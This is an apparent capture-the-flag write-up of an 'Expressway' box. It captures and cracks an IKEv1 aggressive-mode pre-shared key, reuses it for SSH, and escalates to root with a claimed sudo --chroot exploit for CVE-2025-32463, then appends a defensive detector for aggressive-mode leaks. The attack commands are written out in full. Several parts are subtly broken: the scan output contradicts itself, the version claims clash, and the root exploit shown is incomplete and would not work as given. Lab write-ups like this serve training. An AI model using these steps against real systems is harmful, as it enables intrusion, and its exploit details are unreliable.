Recon
TCP scan found SSH and HTTP. The UDP scan was the important one — IKE on UDP 500 is the attack surface for this box.
$ nmap -sC -sV -p 22,80 -oN nmap/tcp 10.129.9.1
22/tcp open ssh     OpenSSH 8.9p1
80/tcp open http    Apache httpd 2.4.52
|_http-title: ExpressWay VPN Provider

$ nmap -sU -p 500 10.129.9.1
500/udp open isakmp
Port 80 is a VPN provider landing page — it advertises IKEv1-based remote access VPN. UDP 500 is the IKE (Internet Key Exchange) port, used for VPN session establishment.
Enumeration
IKEv1 Aggressive Mode PSK Leak
IKEv1 in aggressive mode sends the peer identity and a hash of the Pre-Shared Key (PSK) in cleartext as part of the Phase 1 handshake — before any encryption is established. ike-scan can initiate this handshake and capture the hash.
$ sudo ike-scan -M --aggressive --id=vpnuser 10.129.9.1
10.129.9.1 Main Mode Handshake returned
    HDR=(CKY-R=8f4a2b1c9d3e5f7a)
    SA=(Enc=3DES Hash=SHA1 Auth=PSK Group=2:modp1024 LifeType=Seconds LifeDuration=28800)
    VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
    KEY_EXCH key data
    NONCE nonce data
    HASH hash_data=c3a9d21f5b8e7340a6f2c9d7e0b5a1d9...
Returned 1 handshake; 0 returned handshake; 1 returned notify
The hash is returned in aggressive mode. I saved the full IKE packet exchange and used psk-crack to crack the PSK against rockyou.txt:
$ sudo ike-scan -M --aggressive --id=vpnuser --pskcrack=ike_hash.txt 10.129.9.1
$ psk-crack -d /usr/share/wordlists/rockyou.txt ike_hash.txt
Starting psk-crack [ike-scan 1.9.5] with 1 IKE hashes to crack
key "expressway123" matches hash for 10.129.9.1
Ending psk-crack: 1 PSK cracked in 14.752 seconds (0.07 PSKs/sec)
PSK: expressway123. The PSK is used as the VPN connection password and — as frequently happens — was also reused as a system account password.
Foothold
I configured an IKEv1 VPN connection using the cracked PSK with strongSwan, connected to the VPN, and scanned the internal subnet for additional services. The VPN client username vpnuser with PSK expressway123 also worked as SSH credentials:
$ ssh vpnuser@10.129.9.1
vpnuser@expressway:~$ id
uid=1000(vpnuser) gid=1000(vpnuser) groups=1000(vpnuser)
Privilege Escalation
vpnuser@expressway:~$ sudo --version
Sudo version 1.9.15p2
vpnuser@expressway:~$ sudo -l
User vpnuser may run the following commands on expressway:
    (root) NOPASSWD: /usr/bin/sudo
CVE-2025-32463: a privilege escalation vulnerability in sudo affecting versions before 1.9.17. The vulnerability allows a local user to escalate to root under specific conditions involving how sudo processes the --chroot option with a symlink. Combined with the NOPASSWD sudo entry, exploitation is straightforward:
vpnuser@expressway:~$ mkdir -p /tmp/exploit/usr/lib/sudo
vpnuser@expressway:~$ ln -s / /tmp/exploit/rootfs    # CVE-2025-32463 PoC — chroot manipulation trick
vpnuser@expressway:~$ sudo --chroot /tmp/exploit /bin/bash
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root)
Flags
Lessons Learned
- Always run UDP scans — IKEv1 on UDP 500 is invisible to TCP-only nmap runs but is the entire attack surface for this box.
- IKEv1 aggressive mode is fundamentally insecure — it leaks the PSK hash in the initial handshake before encryption. Always use IKEv2, which doesn't have this property.
- PSK reuse across VPN authentication and system accounts is a critical finding — VPN users should have dedicated service accounts with unique credentials.
- Keep sudo updated — CVE-2025-32463 is in sudo 1.9.15/1.9.16; upgrading to 1.9.17+ patches it. Always check the sudo version during post-exploitation.
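As an added example (not part of the original writeup), a small Python detector that parses the ISAKMP header and payload chain of UDP/500 datagrams and flags IKEv1 aggressive-mode messages carrying ID and HASH payloads in cleartext, which is the exposure the handshake above relies on. The sample packets are constructed inline with empty payload bodies; in practice the function would be fed UDP payloads from a capture.

```python
import struct

# ISAKMP exchange types (RFC 2408 / RFC 7296) relevant to this check.
EXCHANGE = {2: "IKEv1 Main Mode", 4: "IKEv1 Aggressive Mode",
            5: "IKEv1 Informational", 32: "IKEv1 Quick Mode",
            34: "IKEv2 IKE_SA_INIT", 35: "IKEv2 IKE_AUTH"}
# IKEv1 payload types; ID and HASH are the ones aggressive mode sends in clear.
PAYLOAD = {1: "SA", 4: "KE", 5: "ID", 8: "HASH", 10: "NONCE", 13: "VID"}
HDR = struct.Struct("!8s8sBBBBII")   # 28-byte fixed ISAKMP header
FLAG_ENCRYPTED = 0x01                # header flag bit: payloads are ciphertext

def build_isakmp(exchange, version, payload_types, flags=0):
    """Constructed test packet: ISAKMP header plus empty chained payloads."""
    body = b""
    for i, ptype in enumerate(payload_types):
        nxt = payload_types[i + 1] if i + 1 < len(payload_types) else 0
        body += struct.pack("!BBH", nxt, 0, 4)        # generic payload header only
    first = payload_types[0] if payload_types else 0
    return HDR.pack(b"\x11" * 8, b"\x22" * 8, first, version, exchange,
                    flags, 0, HDR.size + len(body)) + body

def inspect_isakmp(packet):
    """Parse one UDP/500 payload; report cleartext payloads and PSK-hash exposure."""
    if len(packet) < HDR.size:
        return None
    _, _, nxt, version, exch, flags, _, length = HDR.unpack_from(packet)
    end, names, off = min(length, len(packet)), [], HDR.size
    while nxt and off + 4 <= end and not flags & FLAG_ENCRYPTED:
        nxt_next, _, plen = struct.unpack_from("!BBH", packet, off)
        if plen < 4:                                   # malformed chain, stop
            break
        names.append(PAYLOAD.get(nxt, str(nxt)))
        nxt, off = nxt_next, off + plen
    aggressive = (version >> 4) == 1 and exch == 4
    exposed = [p for p in ("ID", "HASH") if aggressive and p in names]
    return {"exchange": EXCHANGE.get(exch, f"type {exch}"),
            "cleartext_payloads": names, "exposed": exposed}

def find_psk_leaks(packets):
    """Indexes of packets that carry an aggressive-mode ID/HASH in cleartext."""
    return [i for i, p in enumerate(packets)
            if (r := inspect_isakmp(p)) and r["exposed"]]

if __name__ == "__main__":
    samples = [build_isakmp(2, 0x10, [1, 13]),            # main mode: SA, VID
               build_isakmp(4, 0x10, [1, 4, 10, 5, 8]),   # aggressive reply
               build_isakmp(34, 0x20, [33, 34]),          # IKEv2 IKE_SA_INIT
               build_isakmp(32, 0x10, [8], flags=1)]      # encrypted quick mode
    print(find_psk_leaks(samples))                        # [1]
```

Only the aggressive-mode reply (index 1) is flagged; main mode, IKEv2 and encrypted IKEv1 traffic pass, so the check can sit on a UDP/500 tap without noise from legitimate IKE.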